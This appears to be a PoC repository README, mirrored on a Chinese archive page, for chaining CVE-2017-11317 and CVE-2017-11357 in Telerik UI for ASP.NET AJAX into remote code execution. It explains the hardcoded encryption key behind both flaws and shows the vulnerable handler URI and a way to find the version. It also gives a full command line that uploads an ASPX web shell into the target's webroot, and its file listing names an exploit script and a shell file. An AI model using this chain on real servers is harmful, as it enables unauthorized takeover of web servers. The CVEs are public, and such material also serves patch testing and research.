来源

关联漏洞

介绍

# CVE-2017-11317-and-CVE-2017-11357-in-Telerik

# Description

This couple of CVEs is from the module Upload file.

The version of Telerik UI for ASP.NET AJAX from R1 2017 to R2 2017 SP2 has a couple of encryption Key which were hardcoded:

![hardcoded Key](image.png)

If developers do not use a custom ones, this default key always be used to encrypt and decrypt the user input

The default encryption key open the way to 02 attack surface of the module:
    
+ ``CVE-2017-11317``: Allow attackers choose the dest folder of the uploaded file
+ ``CVE-2017-11357``: Allow attackers upload unsecured file onto the target

Combine two CVE, we have a attack chain to RCE the target's server.

# Exploit

The script I use is from ``bao7uo/RAU_crypto`` .

This Python script build functions that we can use single one to test or automatic upload file onto the target's server

The URI to exploit is ``/Telerik.Web.UI.WebResource.axd?type=rau`` 

If accessing to this URI and the response's message is:

![alt text](images/image-1.png)

High posibility the couple of CVEs can be run

The next step is finding the right version of the target's Telerik

The version is in the comment block and do not have any string before, like this

![alt text](image.png)

Use the option ``-P`` of the script to auto upload the ASPX shell onto known folder inside the webroot.

The command:

```
python3 CVE-2017-11317.py -P "Temps\\" <version> sh3ll.aspx http://<target>/Telerik.Web.UI.WebResource.axd?type=rau 127.0.0.1:8080
```

![alt text](images/image-3.png)

If succeed, RCE!!!

![alt text](images/image-4.png)

文件快照

 [4.0K]  /data/pocs/008244722306c4cdf000060dac3ba53b00beeb8b
├── [4.0K]  images
│   ├── [ 12K]  image-1.png
│   ├── [ 57K]  image-2.png
│   ├── [197K]  image-3.png
│   ├── [ 15K]  image-4.png
│   └── [ 45K]  image.png
├── [1.6K]  README.md
├── [  12]  requirements.txt
├── [ 15K]  script.py
├── [1.5K]  sh3ll.aspx
└── [   3]  test.txt

1 directory, 10 files

备注